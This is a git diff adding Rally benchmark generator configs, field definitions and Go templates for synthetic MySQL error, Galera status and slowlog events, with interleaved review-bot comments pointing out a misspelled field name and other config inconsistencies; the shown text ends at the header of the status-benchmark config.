b/packages/mysql/_dev/benchmark/rally/error-benchmark.yml new file mode 100644 index 00000000000..723bc3aa124 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/error-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.error events ingested +data_stream: + name: error +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./error-benchmark/template.ndjson + config: + path: ./error-benchmark/config.yml + fields: + path: ./error-benchmark/fields.yml diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/error-benchmark/config.yml new file mode 100644 index 00000000000..b3b26cc9c6b --- /dev/null 
+++ b/packages/mysql/_dev/benchmark/rally/error-benchmark/config.yml @@ -0,0 +1,45 @@ +fields: + - name: 'timestamp' + period: -24h + - name: agent_ephemeral_id + value: 14b8ce9f-49d1-4643-8499-23ae7936ea81 + - name: agent_id + value: 5975706d-e804-462d-b6c0-d70b289d54a7 + - name: agent_name + value: docker-fleet-agent + - name: log_level + enum: ["Note", "Warning", "System", "ERROR"] + - name: message + type: text + - name: thread_id + range: + min: 1 + max: 30 + - name: code + range: + min: 10000 + max: 20000 + - name: message_note + enum: + - "InnoDB: Using Linux native AIO" + - "InnoDB: Mutexes and rw_locks use GCC atomic builtins" + - "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M" + - "Initializing buffer pool, size = 128.0M" + - "Mutexes and rw_locks use GCC atomic builtins" + - name: messsage_warning + enum: + - "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead." + - "root@localhost is created with an empty password ! Please consider switching off the --initialize-insecure option." + - "CA certificate ca.pem is self signed." + - "Insecure configuration for --pid-file: Location '/tmp' in the path is accessible to all OS users. Consider choosing a different directory." + - name: message_system + enum: + - "Received SHUTDOWN from user boot. Shutting down mysqld (Version: 8.0.15)." + - "/usr/sbin/mysqld: Shutdown complete (mysqld 8.0.15) MySQL Community Server - GPL." + - "/usr/sbin/mysqld (mysqld 8.0.15) starting as process 1834" + - name: message_error + enum: + - "/usr/sbin/mysqld: unknown variable '--max-connections=512'" + - "InnoDB: Cannot allocate memory for the buffer pool" + - "Plugin 'InnoDB' init function returned error." + - "Unknown/unsupported storage engine: InnoDB" 
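Review bot: `messsage_warning` in the error-benchmark config.yml hunk is misspelled (three s's), while the fields.yml hunk declares `message_warning` and the template.ndjson hunk calls `generate "message_warning"` in its Warning branch, so the curated warning messages are never used; rename the entry to `- name: message_warning`. The `message` entry with `type: text` is referenced by neither the template nor fields.yml and looks like a leftover that can be dropped. What the generator does for a field typed in fields.yml but absent from config.yml is not visible here — presumably a random keyword value rather than an error — so the mismatch would go unnoticed at benchmark time.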
diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/error-benchmark/fields.yml
new file mode 100644
index 00000000000..bf483722466
--- /dev/null
+++ b/packages/mysql/_dev/benchmark/rally/error-benchmark/fields.yml
@@ -0,0 +1,22 @@
+- name: agent_ephemeral_id
+ type: keyword
+- name: agent_id
+ type: keyword
+- name: agent_name
+ type: keyword
+- name: log_level
+ type: keyword
+- name: message_note
+ type: keyword
+- name: message_warning
+ type: keyword
+- name: message_error
+ type: keyword
+- name: message_system
+ type: keyword
+- name: timestamp
+ type: date
+- name: thread_id
+ type: long
+- name: code
+ type: long
diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/error-benchmark/template.ndjson
new file mode 100644
index 00000000000..eefac17b92d
--- /dev/null
+++ b/packages/mysql/_dev/benchmark/rally/error-benchmark/template.ndjson
@@ -0,0 +1,78 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agent_id := generate "agent_id" }} +{{- $agent_name := generate "agent_name" }} +{{- $agent_ephemeral_id := generate "agent_ephemeral_id" }} +{{- $log_level := generate "log_level" }} +{{- $thread_id := generate "thread_id" }} +{{- $code := generate "code" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "name": "{{ $agent_name }}", + "id": "{{ $agent_id }}", + "type": "filebeat", + "ephemeral_id": "{{ $agent_ephemeral_id }}", + "version": "8.8.0" + }, + "log": { + "file": { + "path": "/tmp/service_logs/error.log" + }, + "offset": 0 + }, + "elastic_agent": { + "id": "{{ $agent_id }}", + "version": "8.8.0", + "snapshot": false + }, + {{- if eq $log_level "Note"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_note" }}", + {{- else if eq $log_level "Warning"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_warning" }}", + {{- else if eq $log_level "System"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_system" }}", + {{- else if eq $log_level "ERROR"}} + "message": "{{$timestamp.Format "2006-01-02 15:04:05"}} {{ $thread_id }} [{{ $log_level }}] [MY-0{{ $code }}] [Server] {{ generate "message_error" }}", + {{- end}} + "tags": [ + "mysql-error" + ], + "input": { + "type": "log" + }, + "ecs": { + "version": "8.5.1" + }, + "data_stream": { + "namespace": "default", + "type": "logs", + "dataset": "mysql.error" + }, + "host": { + "hostname": "docker-fleet-agent", + "os": { + "kernel": "3.10.0-1160.105.1.el7.x86_64", + "codename": "focal", + "name": "Ubuntu", + "type": "linux", + "family": "debian", + "version": "20.04.6 LTS (Focal Fossa)", + "platform": "ubuntu" + }, + 
"containerized": true, + "ip": [ + "192.168.244.7" + ], + "name": "docker-fleet-agent", + "id": "11b348d94d79496a84b7330fd69db8f8", + "mac": [ + "02-42-C0-A8-FD-0A" + ], + "architecture": "x86_64" + }, + "event": { + "agent_id_status": "verified", + "timezone": "{{ $timestamp.Format "-07:00" }}", + "dataset": "mysql.error" + } +} \ No newline at end of file diff --git a/packages/mysql/_dev/benchmark/rally/galera_status-benchmark.yml b/packages/mysql/_dev/benchmark/rally/galera_status-benchmark.yml new file mode 100644 index 00000000000..62d658658ca --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galera_status-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.galera_status events ingested +data_stream: + name: galera_status +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./galerastatus-benchmark/template.ndjson + config: + path: ./galerastatus-benchmark/config.yml + fields: + path: ./galerastatus-benchmark/fields.yml diff --git a/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/config.yml new file mode 100644 index 00000000000..c290e2e1903 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/config.yml 
@@ -0,0 +1,164 @@ +fields: + - name: timestamp + period: 60m + - name: EventDuration + range: + min: 1 + max: 1000 + - name: agent_id + value: "a6bbda96-646d-4211-bac8-b40bdd093a0c" + - name: service_address + enum: ["elastic-package-service_mysql_1", "elastic-package-service_mysql_2", "elastic-package-service_mysql_3"] + - name: apply_oooe + range: + min: 1 + max: 100 + - name: apply_oool + range: + min: 1 + max: 100 + - name: apply_window + range: + min: 1 + max: 100 + - name: deps_distance + range: + min: 1 + max: 1000 + - name: index_size + range: + min: 1 + max: 100 + - name: interval + range: + min: 0 + max: 100 + - name: conf_id + range: + min: 1 + max: 1000 + - name: cluster_size + range: + min: 1 + max: 20 + - name: cluster_status + enum: ["Primary", "Non-Primary", "Disconnected"] + - name: commit_oooe + range: + min: 1 + max: 100 + - name: commit_window + range: + min: 1 + max: 100 + - name: connected + enum: ["ON", "OFF"] + - name: evs_evict + value: "bd5fe1c3-7d80-11e9-8913-4f209d688a15" + - name: evs_state + value: "OPERATIONAL" + - name: flow_ctl_paused + range: + min: 0 + max: 1000 + - name: flow_ctl_paused_ns + range: + min: 0 + max: 1000 + - name: flow_ctl_recv + range: + min: 0 + max: 1000 + - name: flow_ctl_sent + range: + min: 0 + max: 1000 + - name: last_committed + range: + min: 1000 + max: 30000 + - name: bf_aborts + range: + min: 1 + max: 1000 + - name: cert_failures + range: + min: 0 + max: 100 + - name: commits + range: + min: 0 + max: 10000 + - name: recv_queue + range: + min: 0 + max: 1000 + - name: recv_queue_avg + range: + min: 0 + max: 1000 + - name: recv_queue_max + range: + min: 1001 + max: 10001 + - name: recv_queue_min + range: + min: 0 + max: 100 + - name: replays + range: + min: 0 + max: 1000 + - name: send_queue + range: + min: 0 + max: 1000 + - name: send_queue_avg + range: + min: 1 + max: 1000 + - name: send_queue_max + range: + min: 1001 + max: 10001 + - name: send_queue_min + range: + min: 0 + max: 100 + - name: state + 
enum: ["Synced", "Joining", "Donor/Desynced", "Joined"] + - name: ready + enum: ["ON", "OFF"] + - name: received_count + range: + min: 1 + max: 1000 + - name: received_bytes + range: + min: 10000 + max: 100000 + - name: data_bytes + range: + min: 10000 + max: 100000 + - name: keys + range: + min: 1 + max: 10000 + - name: keys_bytes + range: + min: 100 + max: 100000 + - name: other_bytes + range: + min: 0 + max: 100000 + - name: count + range: + min: 1 + max: 10000 + - name: bytes + range: + range: + min: 10000 + max: 100000 diff --git a/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/fields.yml new file mode 100644 index 00000000000..2d1332232a1 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/fields.yml 
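Review bot: The last entry of the galerastatus-benchmark config.yml hunk nests `range:` twice under `bytes` (`range:` / `range:` / `min: 10000` / `max: 100000`), which yields `range: {range: {min, max}}` instead of the `range: {min, max}` shape every other entry uses; drop the inner `range:` line so it reads `- name: bytes`, `range:`, `min: 10000`, `max: 100000`. The timestamp `period: 60m` is positive here while the error and slowlog configs use a negative period (`-24h`); if the sign selects past versus future timestamps, confirm which window is intended. `agent_name` and `agent_ephemeral_id` are generated by the template and typed in fields.yml but have no entry here, so they presumably come out as random keyword values, unlike the error-benchmark config, which pins `agent_name` to a fixed value.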
@@ -0,0 +1,94 @@ +- name: EventDuration + type: long +- name: agent_ephemeral_id + type: keyword +- name: agent_id + type: keyword +- name: agent_name + type: keyword +- name: timestamp + type: date +- name: service_address + type: keyword +- name: apply_oooe + type: double +- name: apply_oool + type: double +- name: apply_window + type: double +- name: deps_distance + type: double +- name: index_size + type: long +- name: interval + type: double +- name: conf_id + type: long +- name: cluster_size + type: long +- name: cluster_status + type: keyword +- name: commit_oooe + type: double +- name: commit_window + type: long +- name: connected + type: keyword +- name: evs_evict + type: keyword +- name: evs_state + type: keyword +- name: flow_ctl_paused + type: double +- name: flow_ctl_paused_ns + type: long +- name: flow_ctl_recv + type: long +- name: flow_ctl_sent + type: long +- name: last_committed + type: long +- name: bf_aborts + type: long +- name: cert_failures + type: long +- name: commits + type: long +- name: recv_queue + type: long +- name: recv_queue_avg + type: double +- name: recv_queue_max + type: long +- name: recv_queue_min + type: long +- name: replays + type: long +- name: send_queue + type: long +- name: send_queue_avg + type: double +- name: send_queue_max + type: long +- name: send_queue_min + type: long +- name: state + type: keyword +- name: ready + type: keyword +- name: received_count + type: long +- name: received_bytes + type: long +- name: data_bytes + type: long +- name: keys + type: long +- name: keys_bytes + type: long +- name: other_bytes + type: long +- name: count + type: long +- name: bytes + type: long diff --git a/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/template.ndjson new file mode 100644 index 00000000000..f2a378011e0 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/galerastatus-benchmark/template.ndjson 
@@ -0,0 +1,173 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agent_id := generate "agent_id" }} +{{- $agent_name := generate "agent_name" }} +{{- $agent_ephemeral_id := generate "agent_ephemeral_id" }} +{{- $EventDuration := generate "EventDuration" }} +{{- $service_address := generate "service_address" }} +{{- $apply_oooe := generate "apply_oooe" }} +{{- $apply_oool := generate "apply_oool" }} +{{- $apply_window := generate "apply_window" }} +{{- $deps_distance := generate "deps_distance" }} +{{- $index_size := generate "index_size" }} +{{- $interval := generate "interval" }} +{{- $conf_id := generate "conf_id" }} +{{- $cluster_size := generate "cluster_size" }} +{{- $cluster_status := generate "cluster_status" }} +{{- $commit_oooe := generate "commit_oooe" }} +{{- $commit_window := generate "commit_window" }} +{{- $connected := generate "connected" }} +{{- $evs_evict := generate "evs_evict" }} +{{- $evs_state := generate "evs_state" }} +{{- $flow_ctl_paused := generate "flow_ctl_paused" }} +{{- $flow_ctl_paused_ns := generate "flow_ctl_paused_ns" }} +{{- $flow_ctl_recv := generate "flow_ctl_recv" }} +{{- $flow_ctl_sent := generate "flow_ctl_sent" }} +{{- $last_committed := generate "last_committed" }} +{{- $bf_aborts := generate "bf_aborts" }} +{{- $cert_failures := generate "cert_failures" }} +{{- $commits := generate "commits" }} +{{- $recv_queue := generate "recv_queue" }} +{{- $recv_queue_avg := generate "recv_queue_avg" }} +{{- $recv_queue_max := generate "recv_queue_max" }} +{{- $recv_queue_min := generate "recv_queue_min" }} +{{- $replays := generate "replays" }} +{{- $send_queue := generate "send_queue" }} +{{- $send_queue_avg := generate "send_queue_avg" }} +{{- $send_queue_max := generate "send_queue_max" }} +{{- $send_queue_min := generate "send_queue_min" }} +{{- $state := generate "state" }} +{{- $ready := generate "ready" }} +{{- $received_count := generate "received_count" }} +{{- $received_bytes := generate "received_bytes" }} +{{- 
$data_bytes := generate "data_bytes" }} +{{- $keys := generate "keys" }} +{{- $keys_bytes := generate "keys_bytes" }} +{{- $other_bytes := generate "other_bytes" }} +{{- $count := generate "count" }} +{{- $bytes := generate "bytes" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "{{ $agent_ephemeral_id }}", + "id": "{{ $agent_id }}", + "name": "{{ $agent_name }}", + "type": "metricbeat", + "version": "8.8.0" + }, + "data_stream": { + "dataset": "mysql.galera_status", + "namespace": "ep", + "type": "metrics" + }, + "ecs": { + "version": "8.5.0" + }, + "elastic_agent": { + "id": "{{ $agent_id }}", + "snapshot": false, + "version": "8.8.0" + }, + "event": { + "agent_id_status": "verified", + "dataset": "mysql.galera_status", + "duration": {{ $EventDuration }}, + "module": "mysql" + }, + "host": { + "architecture": "x86_64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "589e678e8f3f457d81e3a530d3ae6011", + "ip": [ + "172.28.0.7" + ], + "mac": [ + "02-42-AC-1C-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "5.10.104-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.5 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "galera_status", + "period": 10000 + }, + "mysql": { + "galera_status": { + "connected": "{{ $connected }}", + "cluster": { + "size": {{ $cluster_size }}, + "conf_id": {{ $conf_id }}, + "status": "{{ $cluster_status }}" + }, + "evs": { + "state": "{{ $evs_state }}", + "evict": "{{ $evs_evict }}" + }, + "apply": { + "oooe": {{ $apply_oooe }}, + "oool": {{ $apply_oool }}, + "window": {{ $apply_window }} + }, + "ready": "{{ $ready }}", + "flow_ctl": { + "paused_ns": {{ $flow_ctl_paused_ns }}, + "paused": {{ $flow_ctl_paused }}, + "recv": {{ $flow_ctl_recv }}, + "sent": {{ $flow_ctl_sent }} + }, + "last_committed": {{ $last_committed }}, + "commit": { + "oooe": {{ 
$commit_oooe }}, + "window": {{ $commit_window }} + }, + "cert": { + "index_size": {{ $index_size }}, + "deps_distance": {{ $deps_distance }}, + "interval": {{ $interval }} + }, + "received": { + "bytes": {{ $received_bytes }}, + "count": {{ $received_count }} + }, + "repl": { + "bytes": {{ $bytes }}, + "keys": {{ $keys }}, + "keys_bytes": {{ $keys_bytes }}, + "count": {{ $count }}, + "other_bytes": {{ $other_bytes }}, + "data_bytes": {{ $data_bytes }} + }, + "local": { + "replays": {{ $replays }}, + "recv": { + "queue_max": {{ $recv_queue_max }}, + "queue_min": {{ $recv_queue_min }}, + "queue_avg": {{ $recv_queue_avg }}, + "queue": {{ $recv_queue }} + }, + "bf_aborts": {{ $bf_aborts }}, + "commits": {{ $commits }}, + "state": "{{ $state }}", + "cert_failures": {{ $cert_failures }}, + "send": { + "queue_max": {{ $send_queue_max }}, + "queue_min": {{ $send_queue_min }}, + "queue_avg": {{ $send_queue_avg }}, + "queue": {{ $send_queue }} + } + } + } + }, + "service": { + "address": "tcp({{ $service_address }}:3306)/?readTimeout=10s\u0026timeout=10s\u0026writeTimeout=10s", + "type": "mysql" + } +} \ No newline at end of file diff --git a/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml index dacdcb301ed..ca46819b19e 100644 --- a/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml +++ b/packages/mysql/_dev/benchmark/rally/performance-benchmark/config.yml @@ -6,7 +6,7 @@ fields: - name: agent.id value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" - name: service_address - enum: ["elastic-package-service_mysql_1","elastic-package-service_mysql_2","elastic-package-service_mysql_3"] + enum: ["elastic-package-service_mysql_1", "elastic-package-service_mysql_2", "elastic-package-service_mysql_3"] - name: max_timer_wait range: min: 1000000000 
diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark.yml b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark.yml
new file mode 100644
index 00000000000..9a79d75f3a7
--- /dev/null
+++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark.yml
@@ -0,0 +1,14 @@
+---
+description: Benchmark 20000 mysql.slowlog events ingested
+data_stream:
+ name: slowlog
+corpora:
+ generator:
+ total_events: 20000
+ template:
+ type: gotext
+ path: ./slowlog-benchmark/template.ndjson
+ config:
+ path: ./slowlog-benchmark/config.yml
+ fields:
+ path: ./slowlog-benchmark/fields.yml
diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/config.yml
new file mode 100644
index 00000000000..e0360717940
--- /dev/null
+++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/config.yml
@@ -0,0 +1,147 @@ +fields: + - name: timestamp + period: -24h # one day + - name: agent.id + value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" + - name: EventDuration + range: + min: 1 + max: 1000 + - name: thread_id + range: + min: 1 + max: 100 + - name: log_slow_rate_type + enum: ["session", "query"] + - name: query_time + range: + min: 0 + max: 10 + - name: lock_time + range: + min: 0 + max: 10 + - name: rows_sent + range: + min: 1 + max: 100 + - name: rows_examined + range: + min: 1000000 + max: 4000000 + - name: rows_affected + range: + min: 1 + max: 100 + - name: last_err_no + range: + min: 0 + max: 100 + - name: killed + range: + min: 0 + max: 100 + - name: bytes_received + range: + min: 0 + max: 3000000 + - name: bytes_sent + range: + min: 0 + max: 3000000 + - name: read_first + range: + min: 0 + max: 100 + - name: read_last + range: + min: 0 + max: 100 + - name: read_key + range: + min: 1000000 + max: 5000000 + - name: read_next + range: + min: 1000000 + max: 5000000 + - name: read_prev + range: + min: 0 + max: 100 + - name: read_rnd + range: + min: 0 + max: 100 + - name: read_rnd_next + range: + min: 0 + max: 1000000 + - name: sort_merge_passes + range: + min: 0 + max: 100 + - name: sort_range_count + range: + min: 0 + max: 100 + - name: sort_rows + range: + min: 0 + max: 100 + - name: sort_scan_count + range: + min: 0 + max: 100 + - name: created_tmp_disk_tables + range: + min: 0 + max: 100 + - name: created_tmp_tables + range: + min: 0 + max: 100 + - name: tmp_table_sizes + range: + min: 1 + max: 100 + - name: innodb_trx_id + range: + min: 1 + max: 100 + - name: merge_passes + range: + min: 1 + max: 100 + - name: innodb_io_r_ops + range: + min: 1 + max: 10000 + - name: innodb_io_r_bytes + range: + min: 10000000 + max: 80000000 + - name: innodb_io_r_wait + range: + min: 0 + max: 10 + - name: innodb_rec_lock_wait + range: + min: 0 + max: 10 + - name: innodb_queue_wait + range: + min: 0 + max: 10 + - name: innodb_pages_distinct + range: + min: 100 + max: 
100000 + - name: log_slow_rate_limit + range: + min: 0 + max: 100 + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: duration_end + enum: ["-30m", "-20m", "-10m", "-40m"] diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/fields.yml new file mode 100644 index 00000000000..d8e0b6eb5f8 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/fields.yml 
@@ -0,0 +1,86 @@ +- name: agent.ephemeral_id + type: keyword +- name: agent.id + type: keyword +- name: agent.name + type: keyword +- name: EventDuration + type: long +- name: timestamp + type: date +- name: source_domain + type: keyword +- name: source_ip + type: ip +- name: thread_id + type: long +- name: query_time + type: float +- name: lock_time + type: float +- name: rows_sent + type: long +- name: rows_examined + type: long +- name: rows_affected + type: long +- name: last_err_no + type: long +- name: killed + type: long +- name: bytes_received + type: long +- name: bytes_sent + type: long +- name: read_first + type: long +- name: read_last + type: long +- name: read_key + type: long +- name: read_next + type: long +- name: read_prev + type: long +- name: read_rnd + type: long +- name: read_rnd_next + type: long +- name: sort_merge_passes + type: long +- name: sort_range_count + type: long +- name: sort_rows + type: long +- name: sort_scan_count + type: long +- name: created_tmp_disk_tables + type: long +- name: created_tmp_tables + type: long +- name: tmp_table_sizes + type: long +- name: innodb_trx_id + type: long +- name: merge_passes + type: long +- name: innodb_io_r_ops + type: long +- name: innodb_io_r_bytes + type: long +- name: innodb_io_r_wait + type: long +- name: innodb_rec_lock_wait + type: long +- name: innodb_queue_wait + type: long +- name: innodb_pages_distinct + type: long +- name: log_slow_rate_type + type: keyword +- name: log_slow_rate_limit + type: long +- name: duration_start + type: keyword +- name: duration_end + type: keyword diff --git a/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/template.ndjson new file mode 100644 index 00000000000..0ae848ba44a --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/slowlog-benchmark/template.ndjson 
@@ -0,0 +1,109 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agentId := generate "agent.id" }} +{{- $agentName := generate "agent.name" }} +{{- $agentEphemeralid := generate "agent.ephemeral_id" }} +{{- $eventDuration := generate "EventDuration" }} +{{- $sourceDomain := generate "source_domain" }} +{{- $sourceIp := generate "source_ip" }} +{{- $threadId := generate "thread_id" }} +{{- $queryTime := generate "query_time" }} +{{- $lockTime := generate "lock_time" }} +{{- $rowsSent := generate "rows_sent" }} +{{- $rowsExamined := generate "rows_examined" }} +{{- $rowsAffected := generate "rows_affected" }} +{{- $lastErrNo := generate "last_err_no" }} +{{- $killed := generate "killed" }} +{{- $bytesReceived := generate "bytes_received" }} +{{- $bytesSent := generate "bytes_sent" }} +{{- $readFirst := generate "read_first" }} +{{- $readLast := generate "read_last" }} +{{- $readKey := generate "read_key" }} +{{- $readNext := generate "read_next" }} +{{- $readPrev := generate "read_prev" }} +{{- $readRnd := generate "read_rnd" }} +{{- $readRndNext := generate "read_rnd_next" }} +{{- $sortMergePasses := generate "sort_merge_passes" }} +{{- $sortRangeCount := generate "sort_range_count" }} +{{- $sortRows := generate "sort_rows" }} +{{- $sortScanCount := generate "sort_scan_count" }} +{{- $createdTmpDiskTables := generate "created_tmp_disk_tables" }} +{{- $createdTmpTables := generate "created_tmp_tables" }} +{{- $tmpTableSizes := generate "tmp_table_sizes" }} +{{- $duration_start := generate "duration_start" }} +{{- $duration_end := generate "duration_end" }} +{{- $startTime := generate "timestamp" | date_modify (print $duration_start) }} +{{- $endTime := generate "timestamp" | date_modify (print $duration_end) }} +{{- $innodbTrxId := generate "innodb_trx_id" }} +{{- $mergePasses := generate "merge_passes" }} +{{- $innodbIoROps := generate "innodb_io_r_ops" }} +{{- $innodbIoRBytes := generate "innodb_io_r_bytes" }} +{{- $innodbIoRWait := generate "innodb_io_r_wait" }} 
+{{- $innodbRecLockWait := generate "innodb_rec_lock_wait" }} +{{- $innodbQueueWait := generate "innodb_queue_wait" }} +{{- $innodbPagesDistinct := generate "innodb_pages_distinct" }} +{{- $logSlowRateType := generate "log_slow_rate_type" }} +{{- $logSlowRateLimit := generate "log_slow_rate_limit" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "name": "{{ $agentName }}", + "id": "{{ $agentId }}", + "type": "filebeat", + "ephemeral_id": "{{ $agentEphemeralid }}", + "version": "8.5.1" + }, + "log": { + "file": { + "path": "/tmp/service_logs/test-mariadb-10-2-12.log" + }, + "offset": 0, + "flags": [ + "multiline" + ] + }, + "elastic_agent": { + "id": "{{ $agentId }}", + "version": "8.5.1", + "snapshot": false + }, + "tags": [ + "mysql-slowlog" + ], + "input": { + "type": "log" + }, + "data_stream": { + "namespace": "default", + "type": "logs", + "dataset": "mysql.slowlog" + }, + "host": { + "hostname": "docker-fleet-agent", + "os": { + "kernel": "3.10.0-1160.102.1.el7.x86_64", + "codename": "focal", + "name": "Ubuntu", + "type": "linux", + "family": "debian", + "version": "20.04.6 LTS (Focal Fossa)", + "platform": "ubuntu" + }, + "containerized": true, + "ip": [ + "172.21.0.7" + ], + "name": "docker-fleet-agent", + "id": "919d5098b9d34b348dd441912f7ad638", + "mac": [ + "02-42-AC-15-00-07" + ], + "architecture": "x86_64" + }, + "message": "# User@Host: root[root] @ {{ $sourceDomain }} [{{ $sourceIp }}] Id: {{ $threadId }}\n# Query_time: {{ $queryTime }} Lock_time: {{ $lockTime }} Rows_sent: {{ $rowsSent }} Rows_examined: {{ $rowsExamined }} Rows_affected: {{ $rowsAffected }} Errno: {{ $lastErrNo }} Killed: {{ $killed }} Bytes_received: {{ $bytesReceived }} Bytes_sent: {{ $bytesSent }} Read_first: {{ $readFirst }} Read_last: {{ $readLast }} Read_key: {{ $readKey }} Read_next: {{ $readNext }} Read_prev: {{ $readPrev }} Read_rnd: {{ $readRnd }} Read_rnd_next: {{ $readRndNext }} Sort_merge_passes: {{ $sortMergePasses }} 
Sort_range_count: {{ $sortRangeCount }} Sort_rows: {{ $sortRows }} Sort_scan_count: {{ $sortScanCount }} Created_tmp_disk_tables: {{ $createdTmpDiskTables }} Created_tmp_tables: {{ $createdTmpTables }} Tmp_table_sizes: {{ $tmpTableSizes }} Start: {{ $startTime.Format "2006-01-02T15:04:05.000000Z" }} End: {{ $endTime.Format "2006-01-02T15:04:05.000000Z" }} InnoDB_trx_id: {{ $innodbTrxId }} QC_Hit: Yes Full_scan: No Full_join: Yes Tmp_table: Yes Tmp_table_on_disk: No Filesort: Yes Filesort_on_disk: No Merge_passes: {{ $mergePasses }} Priority_queue: No InnoDB_IO_r_ops: {{ $innodbIoROps }} InnoDB_IO_r_bytes: {{ $innodbIoRBytes }} InnoDB_IO_r_wait: {{ $innodbIoRWait }} InnoDB_rec_lock_wait: {{ $innodbRecLockWait }} InnoDB_queue_wait: {{ $innodbQueueWait }} InnoDB_pages_distinct: {{ $innodbPagesDistinct }} Log_slow_rate_type: {{ $logSlowRateType }} Log_slow_rate_limit: {{ $logSlowRateLimit }}\nuse employees;\nSET timestamp={{ $timestamp.Unix }};\nSELECT last_name, MAX(salary) AS salary FROM employees\n INNER JOIN salaries ON employees.emp_no = salaries.emp_no\n GROUP BY last_name\n ORDER BY salary DESC\n LIMIT 10;", + "event": { + "duration": {{ $eventDuration }}, + "agent_id_status": "verified", + "timezone": "{{ $timestamp.Format "-07:00" }}", + "dataset": "mysql.slowlog" + } +} \ No newline at end of file diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark.yml b/packages/mysql/_dev/benchmark/rally/status-benchmark.yml new file mode 100644 index 00000000000..c235a29a9fa --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 mysql.status events ingested +data_stream: + name: status +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./status-benchmark/template.ndjson + config: + path: ./status-benchmark/config.yml + fields: + path: ./status-benchmark/fields.yml 
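Review bot: `$startTime` and `$endTime` in the slowlog template.ndjson hunk are derived from two fresh `generate "timestamp"` calls rather than from `$timestamp`, so the `Start:`/`End:` values in the message and the `SET timestamp=` line are unrelated to each other and to `@timestamp`; if each `generate` call draws independently over the 24h period, Start can even fall after End. Deriving both from the already-generated value keeps them consistent: `{{- $startTime := $timestamp | date_modify (print $duration_start) }}` and `{{- $endTime := $timestamp | date_modify (print $duration_end) }}`. `source_domain` and `source_ip` are generated here and typed in the slowlog fields.yml hunk but have no entry in its config.yml hunk, so they presumably come out as random values; that may be intentional, but a short comment in config.yml saying so would help the next reader.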
diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/status-benchmark/config.yml
new file mode 100644
index 00000000000..c9334031864
--- /dev/null
+++ b/packages/mysql/_dev/benchmark/rally/status-benchmark/config.yml
